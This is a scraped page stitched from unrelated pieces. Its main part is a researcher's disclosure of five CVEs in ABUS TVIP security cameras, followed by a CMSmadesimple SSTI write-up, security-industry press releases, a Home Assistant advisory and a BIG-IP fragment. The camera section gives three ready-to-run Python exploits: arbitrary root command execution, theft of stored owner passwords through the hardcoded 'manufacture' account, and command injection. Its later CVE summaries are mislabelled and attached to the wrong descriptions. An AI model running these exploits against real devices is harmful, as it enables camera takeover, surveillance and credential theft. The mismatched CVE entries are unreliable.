Due to incorrect access control, unauthenticated remote attackers can view the /video.mjpg video stream of certain ABUS TVIP cameras.

**Background⌗**

It was a chill friday evening when Ilias, Alexander and myself sat around our local hackspace Chaosdorf, ate some pizza and played around with the ABUS security camera we were able to get in our hands shortly before. As the company has quite some reputation in Germany, we assumed that there wouldn’t be much to find security-wise, also because this camera was one of the most expensive ones in the consumer market. Little did we know that we’d get our first CVEs and security fame that evening as well…

**Objective⌗**

> August Bremicker und Söhne KG, commonly known as ABUS, is a German manufacturer of preventative security technology based in Wetter, North Rhine-Westphalia.
> 
> *   Wikipedia

While ABUS is mostly focusing on physical security technology like door locks and chains, security cameras are also an important branch of their portfolio. Those cameras are bought from a white-label producer, branded and sold. In this case, the affected cameras were produced by taiwanese producer Grain Media with the GM812X chipset.

This means that the discovered vulnerabilities were not necessarily ABUS’ fault, as they didn’t develop the firmware. They could’ve conducted penetration tests though.

Affected by the vulnerabilities are the model numbers / lines:

*   Compact Cameras
    *   TVIP10000
    *   TVIP10001
    *   TVIP10005
    *   TVIP10005A
    *   TVIP10005B
    *   TVIP10050
    *   TVIP10051
    *   TVIP10055A
    *   TVIP10055B
    *   TVIP10500
    *   TVIP10550
    *   TVIP11000
    *   TVIP11050
    *   TVIP11500
    *   TVIP11501
    *   TVIP11502
    *   TVIP11550
    *   TVIP11551
    *   TVIP11552
*   Cameras with movable head
    *   TVIP20000
    *   TVIP20050
    *   TVIP20500
    *   TVIP20550
    *   TVIP21000
    *   TVIP21050
    *   TVIP21500
    *   TVIP21501
    *   TVIP21502
    *   TVIP21550
    *   TVIP21551
    *   TVIP21552
    *   TVIP22500
*   Dome cameras
    *   TVIP31000
    *   TVIP31001
    *   TVIP31050
    *   TVIP31500
    *   TVIP31501
    *   TVIP31550
    *   TVIP31551
    *   TVIP32500
*   Box cameras
    *   TVIP51500
    *   TVIP51550
*   Outside dome cameras
    *   TVIP71500
    *   TVIP71501
    *   TVIP71550
    *   TVIP71551
    *   TVIP72500

Those cameras were sold from 2010 to 2014.

**Timeline⌗**

*   XX-09-2018: Discovery of vulnerabilities in lab environment
*   XX-09-2018: Communication with CCC e.V. for disclosure handling
*   26-11-2018: Initial contact with ABUS, no response
*   18-02-2019: Start of responsible disclosure process with ABUS
*   03-05-2019: Public Announcement by ABUS for a replacement program
*   07-05-2019: Publication of CCC blogpost

This disclosure was picked up by German press shortly after: Heise, Golem, SPIEGEL Online

**Vulnerabilities⌗****CVE-2018-16739⌗**

Authenticated read and write access through directory traversal with command execution

**Description⌗**

Through directory traversal it is possible to utilize the file browser of the web frontend, which seems to be only for displaying file server content, for arbitrary read, write and execution. The browser can be used to read and write files outside the file server directory and to list the contents of any directory. This is done with root privileges.

The affected endpoints are:

*   /cgi-bin/admin/fileread?READ.filePath=<Path> to read the specified file
*   /cgi-bin/admin/filewrite?SAVE.filePath=<Path> to write to the specified file
*   /cgi-bin/admin/sdstate?action=filelistnas&directory=<Path> to list a directory

**Exploitation⌗**

For arbitrary read and write, the exploitation of the endpoints is as simple as it gets, by prefixing the desired path with ../../../../ or by specifying an absolute path.

A trick is required to move from arbitrary write to code execution: if a bash script is placed in the CGI scripts folder of the web server and this script is called via a web browser, the shell script is executed with root privileges. This is also the trick applied on the POC exploit:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import random
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-16739")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        referenceID = random.randint(1000, 9999)
    
        print(huepy.cyan("[~] Exploit for CVE-2018-16739"))
        print(huepy.cyan("    Your reference number is %i." % (referenceID)))
    
        prepareShell(args.url, referenceID, args.cmd)
        execCmd(args.url, referenceID)
        readCmd(args.url, referenceID)
        mrproper(args.url, referenceID)
    
    
    def prepareShell(target, refID, cmd):
        writeCmd(target, refID, "#!/bin/sh\n%s 1>/tmp/%i.log 2>&1" % (cmd, refID))
    
    
    def writeCmd(target, refID, cmd):
        percentCmd = urllib.parse.quote(cmd)
        print(huepy.yellow("[~] writing /opt/cgi/admin/%i.sh" % (refID)))
        r = requests.get("%s/cgi-bin/admin/filewrite?SAVE.filePath=/opt/cgi/admin/%i.sh&SAVE.fileData=%s" % (target, refID, percentCmd), verify=False)
    
    
    def execCmd(target, refID):
        print(huepy.yellow("[~] Executing reference number %i..." % (refID)))
        r = requests.get("%s/cgi-bin/admin/%i.sh" % (target, refID), verify=False)
    
    
    def readCmd(target, refID):
        r = requests.get("%s/cgi-bin/admin/fileread?READ.filePath=/tmp/%i.log" % (target, refID), verify=False)
        print(huepy.green("[+] Command returned on %i:\n" % (refID)) +  r.text)
    
    
    def mrproper(target, refID):
        print(huepy.green("[+] mrproper-ing your waste..."))
        writeCmd(target, refID, "#!/bin/sh\nrm /tmp/%i.log /opt/cgi/admin/%i.sh" % (refID, refID))
        execCmd(target, refID)
    
    
    if __name__ == '__main__':
        main()
    

Note that, as the OS injection itself is blind, log output of your command(s) needs to be written into a log file and read again after the command finishes. This means that if your command runs for an hour, you’ll only be able to get the output after an hour.

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17558⌗**

Hardcoded administrator account with code execution as root

**Description⌗**

The web server is protected against unauthorized access by a user name and password, which can be changed by the person who purchased the camera. This is admin:12345 or admin:admin by default, dependent on software and model. This is dangerous in itself, since an attacker can exploit the fact that the owner of the camera usually does not change this password.

Regardless of the initial values for the admin user account, the web server is also configured to accept the user name manufacture with the password erutcafunam for the /cgi-bin/mft directory in the web server’s root directory. These values cannot be deleted by the owner of the camera, nor can they be changed. This means that all cameras running with the affected software versions can be accessed using this user name and password.

There are several endpoints in the /cgi-bin/mft directory. These endpoints are responsible for changing the WiFi settings of the device. These can be attacked at various points through an OS injection to execute code with root privileges:

**Evaluation⌗**

If the manufacture user account is combined with the input attack, it is possible to execute arbitrary code as root on the camera from outside, even if the owner of the camera has chosen secure passwords. These are simply bypassed.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:C/A:C = Base Score **10.0**

**Exploitation⌗**

Obviously, using the hard-coded credentials for your purposes is as easy as it gets.

Bringing together the puzzle pieces “hardcoded credentials” and “OS injection” gives you endless possibilities; one of them is to leak out the (user-managed) credentials:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    import base64
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17558")
        parser.add_argument('ip', type=str, help='target IP, eg 127.0.0.1')
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17558"))
    
        copyCreds(args.ip) and showCreds(args.ip) and delCreds(args.ip)
    
    
    def copyCreds(target):
        print(huepy.yellow("[~] Copying creds"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;cp%%20/var/www/secret.passwd%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL!"))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def showCreds(target):
        print(huepy.yellow("[~] Here are the credentials of %s" % (target)))
        r = requests.get("http://%s/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL! Here you go:"))
            print("Rights\t\t| Password\t|")
            for line in r.text.split("\n"):
                if "0000" in line:
                    parts = line.split(" ")
                    print("%s\t| %s\t|" % (parts[0], base64.b64decode(parts[1]).decode("utf-8")))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def delCreds(target):
        print(huepy.yellow("[~] Cleaning up"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;rm%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] Successful. Thanks for your cooperation."))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    if __name__ == '__main__':
        main()
    

**CVE-2018-17879⌗**

Remote code execution through OS injection

**Description⌗**

The /cgi-bin/ directory contains several scripts that are used to control and configure the camera. Among other tasks, these scripts are responsible for changes to the camera’s image settings (contrast, color values, brightness) or the network settings of the device. The attack is based on the fact that some of the scripts do not check input that comes from the user and are passed directly to the system() command. If control characters are used to spoof the user input, arbitrary C ode can be executed. For example, such an input could look like this: $(shutdown -h now). This would shut down the camera from the outside. An attacker could use this to completely take over the camera, attack the internal network (private or corporate), launch further attacks from the camera, as well as change, pause or delete the camera’s image, and completely disable the camera.

**Exploitation⌗**

As simple as wrapping a reverse shell code in $(...).

See this exploit, where the injection happens in the UPnP HTTP Port field:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17879")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17879"))
    
        execCmd(args.url, args.cmd)
    
    
    def execCmd(target, command):
        print(huepy.green("[~] Executing command '%s'..." % (command)))
        percentCommand = urllib.parse.quote(command)
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1%%3e/dev/null%%202%%3e/dev/null;%s;false" % (target, percentCommand), verify=False)
        print(r.text[:-3])
        print(huepy.yellow("[~] Cleaning up..."))
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1337" % (target), verify=False)
    
    
    if __name__ == '__main__':
        main()
    

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17878⌗**

Remote code execution through buffer overflows

**Description⌗**

Almost all of the CGI scripts used by the web server take user input to know what to do. The function that is internally responsible for copying this input is sprintf(). This function is vulnerable to a buffer overflow. This allows an attacker, by typing in a specially crafted string, to write over the memory allocated to it, and thus gain complete control of the program and achieve code execution as root.

**Exploitation⌗**

Depending on the binary, buffer size and stack; as no security protections like stack canaries or NX / Data Execution Prevention are in place, this could be easily done via either Shellcode or ROP.

**Evaluation⌗**

CVSS v2: AV:N/AC:H/Au:S/C:C/I:C/A:C = Base Score **7.1**

**CVE-2018-17559⌗**

Access control bypass

**Description⌗**

The web server gets the camera feed from the CGI script /opt/cgi/jpg/image. This script delivers the current frame every second. This script is symlinked to many places in the file system. Among others to /cgi-bin/admin/image, /cgi-bin/admin/image.jpg, /tmp/video.mp4, /cgi-bin/operator/image.jpg.

Most of these endpoints are password protected in the configuration file of the webserver, boa.conf. However, on lines 314-321 it can be seen that after the script and the symlinks to the script are password protected, they are transferred somewhere else again, and these new endpoints are not password protected:

    # boa.conf, L314-321
    Auth /cgi-bin/jpg /var/www/secret.passwd
    
    # [...]
    
    Transfer /video.mp4 /tmp/video.mp4
    Transfer /video.3gp /tmp/video.mp4
    Transfer /video.mjpg /tmp/video.mp4
    Transfer /video.h264 /tmp/video.mp4
    

This results in an attacker accessing /video.mp4 or /video.mjpg being able to view the video feed without the need to authenticate.

**Exploitation⌗**

Access /video.mp4 or /video.mjpg to see the video feed without authentication.

**Evaluation⌗**

As the video stream is the most important output of a security camera, being able to circumvent the protection of the video stream is critical, especially taking into consideration what direction and perspective the camera is facing.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:N/A:N = Base Score **7.8**

**Overall Evaluation & Conclusion⌗**

An attacker can completely take over the camera, attack the internal network (private or company network), launch further attacks from the camera, change or delete the image of the camera, or completely disable the camera, as well as put the camera completely out of operation. This could be particularly problematic in security-critical scenarios, e.g., criminal acts that are recorded and documented by the camera, as evidence could be lost.

While the replacement program may give end users new cameras (which are hopefully not prone to the security issues described here, but I didn’t test that), the risk of having a always-on security device with weak hardware and network access persists. Please put such devices in a separate network or VLAN, protect it with firewall rules, and avoid credential reusage. Reviewing if you really need cameras connected to the internet could be another important step in becoming more secure.

CVE-2018-17559: Five Vulnerabilities in ABUS cameras

Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.

CVE-2018-17558: Five Vulnerabilities in ABUS cameras

An issue was discovered on certain ABUS TVIP cameras. The CGI scripts allow remote attackers to execute code via system() as root. There are several injection points in various scripts.

CVE-2018-17879: Five Vulnerabilities in ABUS cameras

Buffer Overflow vulnerability in certain ABUS TVIP cameras allows attackers to gain control of the program via crafted string sent to sprintf() function.

CVE-2018-17878: Five Vulnerabilities in ABUS cameras

An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component.

**CMSmadesimple SSTI v2.2.18****Author: (Sergio)**

**Description:** Server Side Template Injection (SSTI) vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

**Attack Vectors:** A SSTI vulnerability in the sanitization of the entry in the Content of "Content - Content Manager Menu" allows injecting a malicious payload into a template code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Content Manager- Title" section off Content Menu.

  
We edit that Content field with a template malicious payload.**SSTI Payload:**  
In the following image you can see the embedded code that executes the payload in the main web.

  
We identify the technology used with the following payload.**SSTI Payload:**

  
And the result is the following:

  
Since the payload has worked we know that it uses Smarty, then we obtain the Smarty version with the following payload:**SSTI Payload:**

And in the result we can see the version of Smarty using the SSTI:

  
We can also use the following payload to see the server name variable:**SSTI Payload:**

{$smarty.server.SERVER\_NAME}

  
Below is the result of the SSTI payload with the server name:

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43352: GitHub - sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content: SSTI vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a te

**PRESS RELEASE**

**SHORT HILLS, N.J.****,** **Oct. 26, 2023** **/PRNewswire/ --** Cranium, the leading enterprise AI security and trust software firm, today announced that the company has raised $25 million in Series A funding. Telstra Ventures led the round with participation from KPMG LLP and SYN Ventures. Both participating investors previously provided seed funding when Cranium emerged from stealth six months ago and spun out of KPMG with additional investment from SYN Ventures.

The new round brings Cranium's total funding to $32 million. The funds will be used for innovation, research and development (R&D), and business expansion. Cranium's newest round will build company growth, strengthen customer momentum, and accelerate Cranium Enterprise software platform innovation through product development; scale go-to-market strategies, including sales and marketing efforts; allow investment in R&D to further visibility into the security of AI systems; enhance security, regulation, and compliance in AI/ML environments against adversarial threats; and reinforce its teams and customers with additional support.

"AI is being embedded into every business process and function at an unprecedented speed. Prioritizing responsible AI now, at the beginning of the AI revolution, will allow enterprises to scale more effectively and not run into major roadblocks and compliance issues later," said Jonathan Dambrot, CEO and Co-Founder of Cranium. "We're honored and deeply grateful for the support from our customers and investors whose dedication to Cranium only fuels our commitment to provide unparalleled visibility, trust, and a new level of security when it comes to the entire AI ecosystem of any organization."

Cranium helps organizations gain confidence in the AI-enabled products in services they are both creating and using. Cranium's software is custom-built to address the gap between data science, compliance, and cybersecurity teams by providing a single source of truth for AI security risks, which is done in a way that avoids requiring teams to change their processes, tools, or workflows; its value is ensuring AI systems are secure, trustworthy, and compliant, properly handling vital resources such as health, financial, and consumer data to meet compliance regulations.

"The rapid rate of innovation fueled by the emergence of GenAI capabilities has generated fresh challenges for cybersecurity teams, raising new questions over compliance, trustworthiness, and security of their AI/ML environments," said Marcus Bartram, General Partner at Telstra Ventures. "Cranium stands at the forefront of AI security and trust software, empowering organizations to navigate the crowded cybersecurity industry with its groundbreaking product and pioneering innovations addressing enterprises' urgent needs grappling with AI regulation, compliance, and security frameworks. We're thrilled to invest in the team at Cranium and are confident in the tremendous impact they're poised to make."

Since its inception, Cranium's dedication to making AI security attainable by working with global leaders in health sciences, financial services, consumer packaged goods, and retail showcases its versatility and holistic view of the AI industry. As the first-ever technology spinout out of KPMG's startup incubator, Cranium's mission is to secure the AI revolution, enabling organizations to secure their AI technologies. Cranium's unique design and features, grounded in years of industry experience and high-level partnerships, lend it a distinct edge in the increasingly crowded cybersecurity market.

**About Cranium**

Cranium is the leading enterprise AI security and trust software firm, enabling organizations to gain visibility, security, and compliance across their AI and GenAI systems. Organizations can map, monitor, and manage their AI/ML environments against adversarial threats without interrupting how teams train, test, and deploy their AI models through its Cranium Enterprise software platform. The Cranium platform also allows organizations to quickly gather and share information about the trustworthiness and compliance of their AI models with their third parties, clients, and regulators. Incubated and funded in stealth inside of KPMG Studio, Cranium helps cybersecurity and data science teams understand that AI impacts their systems, data, or services everywhere. Secure your AI at Cranium.AI.

**About Telstra Ventures**

Telstra Ventures Accelerates the Extraordinary – we fuel the growth of standout disruptors. In our first eleven years, 96 investments have generated 38 liquidity events including Auth0, BigCommerce, Box, CrowdStrike, DocuSign, Rancher, Skillz, Snap, and Whispir. To date, our Revenue Acceleration Platform has driven > US$500 million in revenue for our portfolio companies, extending their reach across Australia, Asia, UK and the US. In 2022, we announced the close of our third fund, bringing Funds Under Management to US$1 Billion. To see our full portfolio and learn more, visit www.telstraventures.com.

Cranium Announces $25 Million in Series A Funding to Secure AI

**PRESS RELEASE**

**DENVER****,** **Oct. 26, 2023** **/PRNewswire/ --** New data from the Lumen Technologies (NYSE: LUMN) Distributed Denial of Service (DDoS) mitigation platform landed the banking industry in the unenviable position of being the most targeted vertical of Q3 2023. This is the first time the banking industry topped Lumen's "most targeted verticals" list and was largely due to the events of a single day: Sept. 21, 2023.

On that day, a single banking customer was targeted with more than 230 DDoS attacks – a whopping 4,500% increase over the daily average for that industry – yet it experienced no downtime. Had the attackers been successful, they could have caused significant damage in the form of lost business, remediation costs and reputational damage.

"The successful mitigations for this banking customer can be traced back to Lumen's multi-layered approach to DDoS mitigation," said Brett Lemarinel, director of unified threat management for Lumen. "It starts at our network, where countermeasures are built in, and our intelligent routing technology, which sends excess traffic through our 500+ scrubbing locations. Our DDoS customers have an added layer of protection from Rapid Threat Defense, our proprietary capability that utilizes threat intelligence from Lumen Black Lotus Labs® to block DDoS botnet traffic before it reaches the customer's environment."

Lemarinel continued, "This should be a warning to all other businesses. More than 230 mitigations in a single day suggests the threat actor was determined to wreak havoc on this customer. Even though the attacker failed, the activity we saw on Sept. 21 is a potent reminder that any business can be in an attacker's crosshairs on any given day."

**Other notable findings in the report include:**

A never-before-seen, four-vector combination was attempted during the Sept. 21 event. The four-vector combination included DNS Amplification, IP Fragmentation, Invalid Packets and Static Filtering. Cyber attackers frequently modify their vector combinations as they attempt to defeat mitigation strategies, but the Lumen DDoS mitigation platform has the flexibility required to recognize and stop these attacks before they impact the targeted customers. The total number of attacks decreased in Q3 2023. Attackers frequently run their operations like a business and, as with any business, cyberattacks have seasonal ups and downs. In Q3 2023, Lumen mitigated 4,217 attacks, which was a 23% quarter-over-quarter decrease and a 24% annual decrease. The banking industry was also the most-targeted vertical for application threats, according to Lumen's application protection partner, ThreatX. Among all industries, the highest percentage of blocked traffic (25.5%) came from programmatic access, which are suspicious, automated attempts to access a web application. This number is up 89% from the previous quarter. The banking sector experienced a significant percentage of "Attacks Against Authentication" (nearly 25%), which are used to gain unauthorized access to financial data. Financial institutions are attractive to attackers, as evidenced by the high attack ratio and combination of brute-force attacks that targeted banks in Q3. Protecting financial data is paramount, but robust web application and API protection solutions can help protect the industry.

"The Q3 ThreatX application attack analysis underscores the critical importance of bot protection and the need for awareness of industry-specific threats," said Neil Weitzel, director, Security Operations Center at ThreatX. "The especially high number of programmatic access threats this quarter underscores the prevalence of bots in API and application attacks. In addition, our findings reveal variations in threats across industries, so businesses must stay vigilant and proactive to safeguard their applications and APIs."

**About Lumen Technologies**

Lumen connects the world. We are igniting business growth by connecting people, data, and applications – quickly, securely, and effortlessly. Everything we do at Lumen takes advantage of our network strength. From metro connectivity to long-haul data transport to our edge cloud, security, and managed service capabilities, we meet our customers' needs today and as they build for tomorrow. For news and insights visit news.lumen.com, LinkedIn: /lumentechnologies, Twitter: @lumentechco, Facebook: /lumentechnologies, Instagram: @lumentechnologies, and YouTube: /lumentechnologies.

**About ThreatX**

ThreatX is managed API and application protection that lets you secure them with confidence, not complexity. It blocks botnets and advanced attacks in real time, letting enterprises keep attackers at bay without lifting a finger. Trusted by companies in every industry across the globe, ThreatX profiles attackers and blocks advanced risks to protect APIs and applications 24/7. Learn more at https://www.threatx.com.

Lumen Q3 DDoS Report: Banking Was the Most Targeted Industry for the First Time

[_Part of the Cure53 security audit of Home Assistant._](https://www.home-assistant.io/blog/2023/10/19/security-audits-of-home-assistant/)

The audit team’s analyses confirmed that the `redirect_uri` and `client_id` are alterable when logging in. Consequently, the code parameter utilized to fetch the `access_token` post-authentication will be sent to the URL specified in the aforementioned parameters.

Since an arbitrary URL is permitted and `homeassistant.local` represents the preferred, default domain likely used and trusted by many users, an attacker could leverage this weakness to manipulate a user and retrieve account access. Notably, this attack strategy is plausible if the victim has exposed their Home Assistant to the Internet, since after acquiring the victim’s `access_token`, the adversary would need to utilize it directly towards the instance to achieve any pertinent malicious actions.

To achieve this compromise attempt, the attacker must send a link with a `redirect_uri` that they control to the victim’s own Home Assistant instance. In the eventuality the victim authenticates via the said link, the attacker would obtain code sent to the specified URL in `redirect_uri`, which can then be leveraged to fetch an `access_token`.

An attacker could increase the efficacy of this strategy by registering a nearly identical domain to `homeassistant.local`, which at first glance may appear legitimate and thereby obfuscate any malicious intentions.

Nonetheless, owing to the requirements for victim interaction and Home Assistant instance exposure to the Internet, this severity rating was consequently downgraded to Low.

_Part of the Cure53 security audit of Home Assistant._

The audit team’s analyses confirmed that the redirect_uri and client_id are alterable when logging in. Consequently, the code parameter utilized to fetch the access_token post-authentication will be sent to the URL specified in the aforementioned parameters.

Since an arbitrary URL is permitted and homeassistant.local represents the preferred, default domain likely used and trusted by many users, an attacker could leverage this weakness to manipulate a user and retrieve account access. Notably, this attack strategy is plausible if the victim has exposed their Home Assistant to the Internet, since after acquiring the victim’s access_token, the adversary would need to utilize it directly towards the instance to achieve any pertinent malicious actions.

To achieve this compromise attempt, the attacker must send a link with a redirect_uri that they control to the victim’s own Home Assistant instance. In the eventuality the victim authenticates via the said link, the attacker would obtain code sent to the specified URL in redirect_uri, which can then be leveraged to fetch an access_token.

An attacker could increase the efficacy of this strategy by registering a nearly identical domain to homeassistant.local, which at first glance may appear legitimate and thereby obfuscate any malicious intentions.

Nonetheless, owing to the requirements for victim interaction and Home Assistant instance exposure to the Internet, this severity rating was consequently downgraded to Low.

**References**

*   GHSA-qhhj-7hrc-gqj5
*   https://nvd.nist.gov/vuln/detail/CVE-2023-41893
*   https://github.com/pypa/advisory-database/tree/main/vulns/homeassistant/PYSEC-2023-214.yaml
*   https://www.home-assistant.io/blog/2023/10/19/security-audits-of-home-assistant/

GHSA-qhhj-7hrc-gqj5: Home Assistant vulnerable to account takeover via auth_callback login

**PRESS RELEASE**

**SEATTLE – Oct. 24, 2023 –** WatchGuard® Technologies, a global leader in unified cybersecurity, today announced the launch of WatchGuard MDR, a new 24/7 cybersecurity service purpose-built to make MDR vastly more accessible to managed service providers (MSPs) working to address soaring customer demand for managed cybersecurity delivery. The new service is managed by an elite team of cybersecurity experts and powered by AI. It requires no investment in a traditional security operation center (SOC) infrastructure, advanced technologies, or security experts, which addresses the pressures of scarce cybersecurity professionals and funding faced by MSPs.

“WatchGuard’s new solution has effectively super charged our managed security services business by allowing us to effortlessly tap into the immense potential of MDR and offer it as a value-added service to customers,” said Raul Zayas, president of ZTek Solutions. “By removing the burden on us to create a modern SOC, WatchGuard MDR expedited our ability to give customers what they need the most: top-notch, comprehensive cybersecurity backed by industry-leading cyber experts to ensure a resilient defense against evolving cyber threats. Not only has WatchGuard put us in the fast lane in that regard, they also make it all incredibly simple to do through their Unified Security Platform architecture to help ensure we stay ahead of the curve.”  

Highly customizable and scalable, this new MDR service further strengthens WatchGuard's Unified Security Platform architecture, providing advanced threat detection and response capabilities on top of WatchGuard EDR, EPDR, and Advanced EPDR that empower MSPs to build out robust, comprehensive security offerings for their customers. It comes with the support of WatchGuard’s automated Zero-Trust Application Service, Threat Hunting Service, advanced security analytics, threat intelligence, and a dedicated team of skilled cybersecurity analysts that monitor, detect, and respond to threats 24/7. 

“As a 100% channel-driven company, we wanted to deliver an enterprise-class MDR solution that would allow our MSP partners to expand their business without the expense of building their own SOC or adding to the challenges they already face in finding cybersecurity talent,” said Andrew Young, chief product officer at WatchGuard Technologies. “We are dedicated to supporting our MSP community, and the launch of WatchGuard MDR represents another milestone in the long-term trusted relationships we build with our partners. Not only does this service help MSPs break through existing barriers to entry for delivering managed security services – it allows them to capitalize on a growing opportunity with an innovative new solution we’ve purpose-built for them specifically.” 

**Key Features and Benefits**

WatchGuard MDR is the ideal choice for service providers looking to elevate the security posture of their customers, expand their portfolio, and generate recurring revenue streams with zero investment in modern security operations center (SOC), sophisticated and expensive AI-based technology, and scarce cybersecurity experts. Capabilities include:  

*   **24/7 Endpoint Activity Monitoring and Data Collection –** to provide real-time and retrospective monitoring using event data captured by WatchGuard EPDR or Advanced EPDR in WatchGuard’s modern SOC.
*   **24/7 Proactive Hunting and Detection** – to reduce time to detect and mitigate threats using AI, machine learning, and other advanced techniques to identify indicators of attack, while WatchGuard’s MDR threat hunters search for threats lurking in endpoints.
*   **24/7 Investigation and Validation** – to minimize the impact of potential threats by relying on WatchGuard experts to quickly investigate and accurately validate incidents to determine their nature and severity.
*   **Immediate Incident Notification** – to provide prompt notification with key insights such as affected machines and tactics used when a validated incident occurs so MSPs can take immediate action.
*   **Options for Mitigation and Guidelines for Remediation** – to give MSPs the flexibility to choose the strategy that works best for their business. They can rely on their own team with guidance from WatchGuard experts on how to contain and remove traces of an attack, restore data, patch vulnerabilities, and install additional controls. Or they can outsource the initial response and the containment through endpoint isolation to automated playbooks developed by WatchGuard MDR experts.
*   **Weekly Security Health Status Report and Monthly Activity Reporting** – to build trust with customers by providing regular reports on their security status, which service providers can customize to better engage customers with their MDR service and provide valuable feedback throughout the process.  

For more information about WatchGuard MDR, click here.

**About WatchGuard Technologies, Inc.**

WatchGuard® Technologies, Inc. is a global leader in unified cybersecurity. Our Unified Security Platform® is uniquely designed for managed service providers to deliver world-class security that increases their business scale and velocity while also improving operational efficiency. Trusted by more than 17,000 security resellers and service providers to protect more than 250,000 customers, the company’s award-winning products and services span network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi. Together, they offer five critical elements of a security platform: comprehensive security, shared knowledge, clarity & control, operational alignment, and automation. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.

For additional information, promotions and updates, follow WatchGuard on Twitter (@WatchGuard), on Facebook, or on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org. Subscribe to The 443 – Security Simplified podcast at Secplicity.org, or wherever you find your favorite podcasts.

WatchGuard Launches MDR Service, Helps MSPs Accelerate Cybersecurity Service Delivery




Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated



Loading

×Sorry to interrupt

CSS Error

Refresh

Tag

#auth